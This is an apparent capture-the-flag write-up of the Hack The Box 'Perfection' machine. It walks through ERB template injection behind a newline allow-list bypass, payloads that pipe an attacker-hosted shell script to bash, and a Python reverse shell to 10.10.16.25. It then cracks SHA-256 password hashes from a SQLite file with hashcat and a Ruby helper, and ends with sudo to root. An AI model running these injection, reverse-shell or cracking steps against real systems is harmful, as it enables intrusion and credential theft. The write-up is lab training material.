HTB - Perfection [Easy]
TCP Scan
> TARGET=10.10.11.253 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 80:e4:79:e8:59:28:df:95:2d:ad:57:4a:46:04:ea:70 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMz41H9QQUPCXN7lJsU+fbjZ/vR4Ho/eacq8LnS89xLx4vsJvjUJCcZgMYAmhHLXIGKnVv16ipqPaDom5cK9tig=
| 256 e9:ea:0c:1d:86:13:ed:95:a9:d0:0b:c8:22:e4:cf:e9 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBqNwnyqGqYHNSIjQnv7hRU0UC9Q4oB4g9Pfzuj2qcG4
80/tcp open http syn-ack ttl 63 nginx
| http-methods:
|_ Supported Methods: GET HEAD
|_http-title: Weighted Grade Calculator
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
port 80
http://10.10.11.253/ shows "Powered by WEBrick 1.7.0" in the footer (nginx on :80 fronts a Ruby WEBrick app; the error page below gives its backend address as perfection:3000)
- Found an old WEBrick directory traversal exploit: https://www.exploit-db.com/exploits/5215 (it targets WEBrick on Windows and relies on backslash path separators)
- Tried it anyway. WEBrick rejects the backslashes as a bad URI, and the error page confirms a Linux host with nginx proxying to WEBrick on perfection:3000, so this exploit does not apply here:
> curl 'http://10.10.11.253/..\..\..\..\..\..\windows\system32\drivers\etc\hosts'
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<HTML>
<HEAD><TITLE>Bad Request</TITLE></HEAD>
<BODY>
<H1>Bad Request</H1>
bad URI `/..\..\..\..\..\..\windows\system32\drivers\etc\hosts'.
<HR>
<ADDRESS>
WEBrick/1.7.0 (Ruby/3.0.2/2021-07-07) at
perfection:3000
</ADDRESS>
</BODY>
</HTML>
foothold
- There is a weighted grade calculator at /weighted-grade-calc (a POST form with category/grade/weight fields)
- Input is reflected into the result page. A category value ending in a URL-encoded newline (%0a) produces an extra newline in the output, so whatever allow-list check the form applies is satisfied by the first line only (in Ruby, ^ and $ match at line boundaries, which is the likely reason). Since the backend is Ruby, the next test is whether the reflected text is evaluated as an ERB template.
curl http://10.10.11.253/weighted-grade-calc -d 'grade1=1&weight1=20&category2=b&grade2=2&weight2=20&category3=c&grade3=3&weight3=20&category4=d&grade4=4&weight4=20&category5=e&grade5=5&weight5=20&category1=a%0a'
Your total grade is 3%<p>a
: 0%</p><p>b: 0%</p><p>c: 0%</p><p>d: 0%</p><p>e: 1%</p>
# try a callback: an ERB tag after the newline; if it is evaluated, the target fetches a page from our host (10.10.16.25)
> curl http://10.10.11.253/weighted-grade-calc -d 'grade1=1&weight1=20&category2=b&grade2=2&weight2=20&category3=c&grade3=3&weight3=20&category4=d&grade4=4&weight4=20&category5=e&grade5=5&weight5=20&category1=a%0a<%25=system("curl 10.10.16.25")%25>'
- received the callback on a python web server on kali, so we have code execution via ERB:
> python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.253 - - [26/Mar/2024 10:29:16] "GET / HTTP/1.1" 200 -
- compose a reverse shell script (shell.sh) to be served from kali; start a listener first (e.g. nc -lvnp 4444) to catch the connection
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.25",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
# kali: serve the script and pull it through the same injection
> curl http://10.10.11.253/weighted-grade-calc -d 'grade1=1&weight1=20&category2=b&grade2=2&weight2=20&category3=c&grade3=3&weight3=20&category4=d&grade4=4&weight4=20&category5=e&grade5=5&weight5=20&category1=a%0a<%25=system("curl 10.10.16.25/shell.sh|bash")%25>'
- the shell comes back as susan; get the user flag (user.txt is root-owned but group-readable by susan)
susan@perfection:~$ ls -la
ls -la
total 48
drwxr-x--- 7 susan susan 4096 Feb 26 09:41 .
drwxr-xr-x 3 root root 4096 Oct 27 10:36 ..
lrwxrwxrwx 1 root root 9 Feb 28 2023 .bash_history -> /dev/null
-rw-r--r-- 1 susan susan 220 Feb 27 2023 .bash_logout
-rw-r--r-- 1 susan susan 3771 Feb 27 2023 .bashrc
drwx------ 2 susan susan 4096 Oct 27 10:36 .cache
drwx------ 3 susan susan 4096 Mar 25 11:38 .gnupg
lrwxrwxrwx 1 root root 9 Feb 28 2023 .lesshst -> /dev/null
drwxrwxr-x 3 susan susan 4096 Oct 27 10:36 .local
drwxr-xr-x 2 root root 4096 Oct 27 10:36 Migration
-rw-r--r-- 1 susan susan 807 Feb 27 2023 .profile
lrwxrwxrwx 1 root root 9 Feb 28 2023 .python_history -> /dev/null
drwxr-xr-x 4 root susan 4096 Oct 27 10:36 ruby_app
lrwxrwxrwx 1 root root 9 May 14 2023 .sqlite_history -> /dev/null
-rw-r--r-- 1 susan susan 0 Oct 27 06:41 .sudo_as_admin_successful
-rw-r----- 1 root susan 33 Mar 25 03:21 user.txt
-rw-r--r-- 1 susan susan 39 Oct 17 12:26 .vimrc
susan@perfection:~$ cat user.txt
cat user.txt
6af9eb3396a11dfe827551b25a0cb520
pe (privilege escalation)
- found a SQLite database in ~/Migration (root-owned, world-readable)
susan@perfection:~/Migration$ ls -la
ls -la
total 16
drwxr-xr-x 2 root root 4096 Oct 27 10:36 .
drwxr-x--- 7 susan susan 4096 Feb 26 09:41 ..
-rw-r--r-- 1 root root 8192 May 14 2023 pupilpath_credentials.db
- dump it with strings (no sqlite3 client needed); the users table holds a name and a 64-hex-char hash, i.e. SHA-256 sized
strings pupilpath_credentials.db
SQLite format 3
tableusersusers
CREATE TABLE users (
id INTEGER PRIMARY KEY,
name TEXT,
password TEXT
Stephen Locke154a38b253b4e08cba818ff65eb4413f20518655950b9a39964c18d7737d9bb8S
David Lawrenceff7aedd2f4512ee1848a3e18f86c4450c1c76f5c6e27cd8b0dc05557b344b87aP
Harry Tylerd33a689526d49d32a01986ef5a1a3d2afc0aaee48978f06139779904af7a6393O
Tina Smithdd560928c97354e3c22972554c81901b74ad1b35f726a11654b78cd6fd8cec57Q
Susan Millerabeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f
- the hashes need cracking. Below is the mapping from each DB name to the password prefix the mail further down specifies ({firstname}_{firstname backwards}_); hashes.txt for hashcat contains only the hash column, one per line
susan_nasus abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f
tina_anit dd560928c97354e3c22972554c81901b74ad1b35f726a11654b78cd6fd8cec57
harry_yrrah d33a689526d49d32a01986ef5a1a3d2afc0aaee48978f06139779904af7a6393
david_divad ff7aedd2f4512ee1848a3e18f86c4450c1c76f5c6e27cd8b0dc05557b344b87a
stephen_nehpets 154a38b253b4e08cba818ff65eb4413f20518655950b9a39964c18d7737d9bb8
- upload and run linpeas; it flags a mail for susan
╔══════════╣ Mails (limit 50)
39937 4 -rw-r----- 1 root susan 625 May 14 2023 /var/mail/susan
39937 4 -rw-r----- 1 root susan 625 May 14 2023 /var/spool/mail/susan
susan@perfection:~$ cat /var/spool/mail/susan
cat /var/spool/mail/susan
Due to our transition to Jupiter Grades because of the PupilPath data breach, I thought we should also migrate our credentials ('our' including the other students
in our class) to the new platform. I also suggest a new password specification, to make things easier for everyone. The password format is:
{firstname}_{firstname backwards}_{randomly generated integer between 1 and 1,000,000,000}
Note that all letters of the first name should be convered into lowercase.
Please hit me with updates on the migration when you can. I am currently registering our university with the platform.
- Tina, your delightful student
- crack: 64 hex chars is SHA-256 (hashcat -m 1400). Mask attack with the known prefix and a 9-digit suffix; the mail allows 1 to 1,000,000,000, so if 9 digits does not hit, add -i --increment-min to walk shorter lengths (and a tenth ?d for the upper bound itself)
> hashcat -m 1400 -a 3 hashes.txt susan_nasus_?d?d?d?d?d?d?d?d?d
> hashcat -m 1400 -a 3 hashes.txt tina_anit_?d?d?d?d?d?d?d?d?d
> hashcat -m 1400 -a 3 hashes.txt harry_yrrah_?d?d?d?d?d?d?d?d?d
> hashcat -m 1400 -a 3 hashes.txt david_divad_?d?d?d?d?d?d?d?d?d
> hashcat -m 1400 -a 3 hashes.txt stephen_nehpets_?d?d?d?d?d?d?d?d?d
- all five crack (hash:plain)
abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f:susan_nasus_413759210
dd560928c97354e3c22972554c81901b74ad1b35f726a11654b78cd6fd8cec57:tina_anit_916066225
d33a689526d49d32a01986ef5a1a3d2afc0aaee48978f06139779904af7a6393:harry_yrrah_782072564
ff7aedd2f4512ee1848a3e18f86c4450c1c76f5c6e27cd8b0dc05557b344b87a:david_divad_274797280
154a38b253b4e08cba818ff65eb4413f20518655950b9a39964c18d7737d9bb8:stephen_nehpets_609653958
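The password model from the mail turned into code, as an added example (not from the page or the box): it derives the prefix per user, builds the hashcat command with an increment range sized to that prefix, verifies a recovered plaintext against the DB hash, and runs a tiny pure-Ruby mask search so the work hashcat does at scale is visible. The hashes are the ones from the strings dump above; the brute() window in the usage is constructed around the known answer to keep runtime trivial.

```ruby
require 'digest'

# Name -> SHA-256 hex, copied from the strings dump of pupilpath_credentials.db
DB_HASHES = {
  'Stephen Locke'  => '154a38b253b4e08cba818ff65eb4413f20518655950b9a39964c18d7737d9bb8',
  'David Lawrence' => 'ff7aedd2f4512ee1848a3e18f86c4450c1c76f5c6e27cd8b0dc05557b344b87a',
  'Harry Tyler'    => 'd33a689526d49d32a01986ef5a1a3d2afc0aaee48978f06139779904af7a6393',
  'Tina Smith'     => 'dd560928c97354e3c22972554c81901b74ad1b35f726a11654b78cd6fd8cec57',
  'Susan Miller'   => 'abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f',
}.freeze

# Password prefix from the mail: {firstname}_{firstname backwards}_ (lowercase)
def prefix_for(full_name)
  first = full_name.split.first.downcase
  "#{first}_#{first.reverse}_"
end

# hashcat command for one user. The integer is 1..1,000,000,000, so the suffix is
# 1 to 10 digits. Literal mask characters count as positions, so the increment
# starts at prefix length + 1 and walks up to the full ten-digit mask.
def hashcat_cmd(full_name, hashfile = 'hashes.txt')
  pre = prefix_for(full_name)
  "hashcat -m 1400 -a 3 -i --increment-min #{pre.length + 1} #{hashfile} #{pre}#{'?d' * 10}"
end

# Check a recovered plaintext against the stored hash (what a hash:plain line claims)
def verify(full_name, number)
  Digest::SHA256.hexdigest("#{prefix_for(full_name)}#{number}") == DB_HASHES[full_name]
end

# Tiny pure-Ruby mask search over a window of suffixes; returns the integer or nil
def brute(full_name, from, to)
  pre, target = prefix_for(full_name), DB_HASHES[full_name]
  (from..to).find { |n| Digest::SHA256.hexdigest("#{pre}#{n}") == target }
end

if __FILE__ == $PROGRAM_NAME
  DB_HASHES.each_key { |name| puts hashcat_cmd(name) }
  puts verify('Susan Miller', 413759210)                 # true
  puts brute('Susan Miller', 413759200, 413759220)       # 413759210
end
```

verify() is the check worth keeping around: it confirms a cracked line really matches the DB hash before the password is tried anywhere, which catches a copy error in hashes.txt early.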
- susan_nasus_413759210 is susan's own password; .sudo_as_admin_successful in her home already hinted she has sudo rights, and sudo accepts it:
susan@perfection:~$ sudo cat /root/root.txt
5391c357c4c016d2c9a99b98a9822ef7
Support meowmeow
If you find this article useful, please support: https://www.buymeacoffee.com/meowmeowattack